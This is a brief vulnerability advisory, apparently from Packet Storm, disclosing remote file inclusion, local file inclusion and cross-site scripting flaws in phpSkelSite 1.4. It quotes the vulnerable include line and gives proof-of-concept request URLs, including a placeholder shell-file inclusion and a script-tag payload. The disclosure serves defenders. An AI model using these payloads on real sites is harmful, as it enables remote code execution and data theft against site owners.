phpSkelSite version 1.4 suffers from remote file inclusion, local file inclusion, and cross site scripting vulnerabilities.
7fd10dada99f3c35bcb4b8959de59e46fa31e688bed2bab3291cac95faf785bf-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite
------------------------------------------------------------------
download from:https://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip
------------------------------------------------------------------
........................................................
vul:/skysilver/login.tpl.php line 1
<? include $theme.'/pageheading'.$TplSuffix ; ?>
------------------------------------------------------
Rfi:
https://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]
Lfi:
https://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]
***************************************************
xss:
https://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed